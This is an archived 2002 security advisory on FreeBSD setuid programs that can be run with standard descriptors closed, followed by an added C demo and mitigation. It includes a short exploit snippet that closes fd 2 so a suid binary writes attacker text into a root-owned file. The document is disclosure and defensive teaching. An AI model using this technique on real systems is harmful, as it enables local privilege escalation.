Pine Internet Advisory: Setuid application execution may give local root in FreeBSD

From: Patrick Oonk (patrickat_private)
Date: Mon Apr 22 2002 - 01:58:25 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    
     -----------------------------------------------------------------------------
     Pine Internet Security Advisory
     -----------------------------------------------------------------------------
     Advisory ID       : PINE-CERT-20020401
     Authors           : Joost Pol <joostat_private>
     Issue date        : 2002-04-22 
     Application       : Multiple
     Version(s)        : Multiple 
     Platforms         : FreeBSD confirmed, maybe others.
     Vendor informed   : 20020406 
     Availability      : http://www.pine.nl/advisories/pine-cert-20020401.txt
     -----------------------------------------------------------------------------
    
    Synopsis
    
    	It is possible for a local user to execute a suid application with 
    	stdin, stdout or stderr closed.
    
    Impact
    
    	HIGH. Local users should be able to gain root privileges. 
    
    Description
    
    	Consider the following (imaginary) suid application:
    
    	-- begin of imaginary code snippet
    
    		#include <stdio.h>
    
    		int main(int argc, char *argv[])
    		{
    			FILE * f = fopen("/etc/root_owned_file", "r+");
    
    			if(f) {
    				/* if the caller closed fd 2, fopen() above was
    				 * handed fd 2 and this message lands in the file */
    				fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);
    
    				fclose(f);
    			}
    			return 0;
    		}
    
    	-- end of imaginary code snippet
    		
    	Now, consider the following (imaginary) exploit:
    
    	-- begin of imaginary exploit snippet
    
    		#include <unistd.h>
    
    		int main(void)
    		{
    			/* use up every free descriptor ... */
    			while(dup(1) != -1); 
    
    			/* ... then free exactly fd 2, so the suid program's
    			 * first open() is handed it */
    			close(2);
    
    			execl("/path/to/suid_application",
    			      "this text will end up in the root_owned_file", (char *)0);
    			return 1;
    		}
    
    	-- end of imaginary exploit snippet
    
    	Exploitation has been confirmed using the S/KEY binaries. 
    
    Solution
    
    	FreeBSD source trees have been updated on the 21st of April 2002. 
    	Please cvsup.
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: 2.6.3ia
    Charset: noconv
    
    iQEVAwUBPMPQffplhmN+UTQRAQE/bggAwkCUhmkv5QUVVE/pUcHIkN26Txa0Pv6T
    4q4Iu4TKi6YhJYJ5Jlh0YhlgkurVE7/qAokvxEfdgHQTR68uCPJhDQTKp/9uJ+PG
    qt+InMh7NHaOdIvEjcH74D9zxEC14uH+SrXmmmZno601d9mLcBZyKs0ZgOFCBnJr
    QToyEgs709xtnbs5OP8iPxn6dhZADMPM9NJbtU2EvkSUqRoDB8H1awUAANI/8RzJ
    4HOLDkFOkYFaNFvbYMULStGU5nH9OTHtOuTw7decgHBK6h9H8FhYf8Yn2hMq8wf0
    p8/v5m535gPHqoX9HWvfMw2LdIr36mol5K9br9033XrOdIG5itn5aQ==
    =AMED
    -----END PGP SIGNATURE-----
    
    -- 
     patrick oonk - pine internet - patrickat_private - www.pine.nl/~patrick
     T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl 
     PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
     Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
     Excuse of the day: it has Intel Inside
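The following is an added example, not part of the advisory above or of any FreeBSD code. It reproduces the descriptor-reuse effect inside a single unprivileged process, using a temporary file under /tmp (assumed writable) in place of /etc/root_owned_file: fd 2 is closed the way the exploit does before execl(), the advisory's fopen()/fprintf(stderr) sequence runs unchanged, and the file is read back to show the attacker-chosen argv[0] text ended up in it. The `hardened` path applies the common userland defence of opening /dev/null until the lowest free descriptor is above 2, so that no later open() can be handed a standard fd; this is a general mitigation pattern and is not claimed to be the exact change FreeBSD committed.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Mitigation: a setuid program cannot trust its caller to leave fds 0, 1
 * and 2 open.  Open /dev/null until the lowest free descriptor is above 2,
 * so later open()/fopen() calls can never be handed a standard fd. */
static int ensure_std_fds(void)
{
    for (;;) {
        int fd = open("/dev/null", O_RDWR);
        if (fd == -1)
            return -1;
        if (fd > 2) {              /* 0, 1 and 2 are all in use now */
            close(fd);
            return 0;
        }
    }
}

/* Re-creates the advisory's scenario in one process.  A temp file stands in
 * for /etc/root_owned_file and `argv0` plays the attacker-chosen argv[0].
 * On return `out` holds the file's final contents; the return value is the
 * descriptor fopen() was handed, or -1 on error. */
int run_scenario(int hardened, const char *argv0, char *out, size_t outlen)
{
    char path[] = "/tmp/fd_reuse_demo_XXXXXX";   /* constructed stand-in file */
    int tmp = mkstemp(path);
    if (tmp == -1)
        return -1;
    (void)write(tmp, "original\n", 9);
    close(tmp);

    /* Start from a normal state (0, 1, 2 open), then do what the exploit
     * does right before execl(): leave exactly fd 2 free. */
    ensure_std_fds();
    int saved_err = dup(2);
    close(2);

    if (hardened)
        ensure_std_fds();          /* fd 2 now refers to /dev/null */

    /* --- the suid application's code, as in the advisory --- */
    int got = -1;
    FILE *f = fopen(path, "r+");
    if (f) {
        got = fileno(f);           /* 2 when not hardened */
        fprintf(stderr, "%s: fopen() succeeded\n", argv0);
        fclose(f);
    }
    /* -------------------------------------------------------- */

    dup2(saved_err, 2);            /* give this process its stderr back */
    close(saved_err);

    int rd = open(path, O_RDONLY);
    ssize_t n = (rd == -1) ? -1 : read(rd, out, outlen - 1);
    out[n > 0 ? n : 0] = '\0';
    if (rd != -1)
        close(rd);
    unlink(path);
    return got;
}

int main(void)
{
    char buf[256];
    const char *argv0 = "this text will end up in the root_owned_file";

    int fd = run_scenario(0, argv0, buf, sizeof buf);
    printf("unhardened: fopen() got fd %d, file now: %s", fd, buf);

    fd = run_scenario(1, argv0, buf, sizeof buf);
    printf("hardened:   fopen() got fd %d, file now: %s", fd, buf);
    return 0;
}
```

In the unhardened run fopen() receives fd 2, so the stdio `stderr` stream and the freshly opened file share one open file description; fprintf(stderr, ...) writes at offset 0 and overwrites the file's contents with the attacker's argv[0]. In the hardened run fd 2 already holds /dev/null, fopen() gets fd 3 or higher, the message is discarded, and the file is untouched.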
    



    This archive was generated by hypermail 2b30 : Mon Apr 22 2002 - 14:49:51 PDT